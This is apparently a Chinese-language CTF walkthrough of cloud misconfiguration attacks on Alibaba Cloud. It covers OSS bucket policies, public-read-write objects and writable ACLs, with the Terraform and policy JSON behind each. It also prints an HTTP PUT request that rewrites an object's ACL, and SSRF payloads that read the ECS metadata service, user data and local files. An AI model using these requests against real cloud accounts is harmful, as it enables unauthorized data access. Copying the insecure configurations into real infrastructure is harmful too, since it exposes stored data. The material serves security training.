目錄
OSS-bucket_policy_readable
OSS-object_public_access
OSS-bucket_object_traversal
OSS-Special Bucket Policy
OSS-unrestricted_file_upload
OSS-object_acl_writable
ECS-SSRF
云攻防場景下對云廠商服務的利用大同小異,下面以阿里云為例
其他如騰訊云、華為云、谷歌云、AWS、Azure不一一列舉
OSS-bucket_policy_readable
桶策略可讀
?policy可以看到存儲桶策略
成功讀到flag
OSS-object_public_access
對象公共訪問
resource "alicloud_oss_bucket_object" "huoxian_terraformgoat_object" {bucket = alicloud_oss_bucket.huoxian_terraformgoat_bucket.bucketacl = "public-read"key = "flag"source = "./flag"depends_on = [alicloud_oss_bucket.huoxian_terraformgoat_bucket]
}
訪問./flag
OSS-bucket_object_traversal
存儲桶對象遍歷
{"Effect": "Allow","Action": ["oss:ListObjects","oss:GetObject"],"Principal": ["*"],"Resource": ["acs:oss:*:*:*"],"Condition": {"StringLike": {"oss:Prefix": ["*"]}}}
OSS-Special Bucket Policy
特殊存儲桶策略
{"Effect": "Allow","Action": ["oss:ListObjects","oss:GetObject"],"Principal": ["*"],"Resource": ["acs:oss:*:*:*"],"Condition": {"StringEquals": {"acs:UserAgent": ["HxSecurityLab"]}}}默認無權限訪問
加上UA頭
User-Agent: HxSecurityLab
OSS-unrestricted_file_upload
不受限制的文件上傳
resource "alicloud_oss_bucket_object" "flag" {bucket = alicloud_oss_bucket.Put_bucket_acl.bucketkey = "hx.png"source = "./dist/hx.png"content_type = "inline"acl = "public-read-write"
}
PUT覆蓋原有文件
PUT新建文件
OSS-object_acl_writable
對象ACL可寫
{"Version": "1","Statement": [{"Effect": "Allow","Action": ["oss:GetObjectAcl","oss:PutObjectAcl"],"Principal": ["*"],"Resource": ["acs:oss:*:*:*/*"]}]
}
直接訪問flag.txt,403
查看acl
通過PUT方法將Object的ACL改為public-read
PUT /flag.txt?acl HTTP/1.1
Host: hx-cloud-security-2rr50.oss-cn-beijing.aliyuncs.com
x-oss-object-acl: public-read
看到成功修改
成功讀到flag
ECS-SSRF
用戶可以通過 SSRF 漏洞獲取到 ECS 上的元數據、用戶數據等信息。
讀取元數據
http://100.100.100.200/latest/meta-data/100.100.100.200 是一個特殊的保留 IP 地址,用于阿里云的元數據服務(Metadata Service)。它允許云服務器實例從內部網絡獲取自身的元數據,而無需訪問外網。
讀取用戶數據
http://100.100.100.200/latest/user-data/User Data:用戶在創建 ECS 時傳入的腳本或配置
讀flag
file:///flag69152201.txt
)
)
